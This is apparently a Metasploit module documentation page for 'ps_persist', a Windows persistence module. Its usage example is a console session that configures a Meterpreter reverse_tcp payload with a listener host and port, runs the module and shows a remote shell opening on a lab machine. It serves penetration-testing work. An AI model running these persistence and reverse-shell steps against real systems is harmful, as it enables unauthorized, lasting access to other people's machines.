64 lines
2.1 KiB
Markdown
64 lines
2.1 KiB
Markdown
|
|
## Example Usage
|
|
|
|
```
|
|
msf exploit(handler) > use exploit/windows/local/ps_persist
|
|
msf exploit(ps_persist) > set session -1
|
|
session => -1
|
|
msf exploit(ps_persist) > set payload windows/meterpreter/reverse_tcp
|
|
payload => windows/meterpreter/reverse_tcp
|
|
msf exploit(ps_persist) > set lhost 192.168.56.1
|
|
lhost => 192.168.56.1
|
|
msf exploit(ps_persist) > set lport 4445
|
|
lport => 4445
|
|
msf exploit(ps_persist) > show options
|
|
|
|
Module options (exploit/windows/local/ps_persist):
|
|
|
|
Name Current Setting Required Description
|
|
---- --------------- -------- -----------
|
|
OUTPUT_TARGET no Name and path of the generated executable, default random, omit extension
|
|
SESSION -1 yes The session to run this module on.
|
|
START_APP true no Run EXE/Install Service
|
|
SVC_DNAME MsfDynSvc no Display Name to use for the Windows Service
|
|
SVC_GEN false no Build a Windows service, which defaults to running as localsystem
|
|
SVC_NAME MsfDynSvc no Name to use for the Windows Service
|
|
|
|
|
|
Payload options (windows/meterpreter/reverse_tcp):
|
|
|
|
Name Current Setting Required Description
|
|
---- --------------- -------- -----------
|
|
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
|
LHOST yes The listen address
|
|
LPORT 4445 yes The listen port
|
|
|
|
|
|
Exploit target:
|
|
|
|
Id Name
|
|
-- ----
|
|
0 Universal
|
|
|
|
|
|
msf exploit(ps_persist) > run
|
|
|
|
[*] Started reverse TCP handler on 192.168.56.1:4445
|
|
[+] - Bytes remaining: 9664
|
|
[+] - Bytes remaining: 1664
|
|
[+] Payload successfully staged.
|
|
[*] Sending stage (957999 bytes) to 192.168.56.101
|
|
[+] Finished!
|
|
[*] Meterpreter session 2 opened (192.168.56.1:4445 -> 192.168.56.101:49974) at 2016-10-08 18:42:36 -0500
|
|
|
|
meterpreter > sysinfo
|
|
Computer : DESKTOP-B8ALP1P
|
|
OS : Windows 10 (Build 14393).
|
|
Architecture : x64 (Current Process is WOW64)
|
|
System Language : en_US
|
|
Domain : WORKGROUP
|
|
Logged On Users : 2
|
|
Meterpreter : x86/win32
|
|
```
|
|
|